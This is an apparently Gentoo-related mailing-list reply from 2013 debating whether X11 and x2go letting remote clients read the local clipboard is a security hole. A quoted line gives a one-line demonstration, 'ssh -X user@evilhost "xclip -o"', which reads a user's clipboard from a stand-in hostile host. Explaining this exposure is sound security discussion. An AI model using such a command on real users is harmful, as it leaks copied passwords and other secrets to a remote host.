On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> Yes, other related tools like X11. x2go is basically just a faster
> version of the traditional xforwarding. In X11 every client can always
> access the clipboard/selection/etc., so you will also have the same
> security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> demonstrates this.
Well but that "argument" doesn't really count:
1) Just because others do it plainly insecure, you cannot do it like
this as well... like as if Gentoo would say "if Debian breaks their
OpenSSL entropy, we should do so, too"... o.O

2) Literally no one who has a decent mind of security, will allow other
hosts do directly access their X server.. because then you're (security
wise) anyway screwed...
And I thought NX would secure what's sent from remote in order to not
being able to overtake the input/output devices of the hosts (whole)
Xserver).


> I disagree, this is not a hole at all, it works as intended. Its just
> that users are often not educated about the implications of passing
> around passwords via the clipboard etc.
Na I disagree... if even people would be educated (which is not
realistic) it will happen by accident, that you copy sensitive
information... sometimes other programs may do this even automatically
and you can't to anything against.


Cheers,
Chris.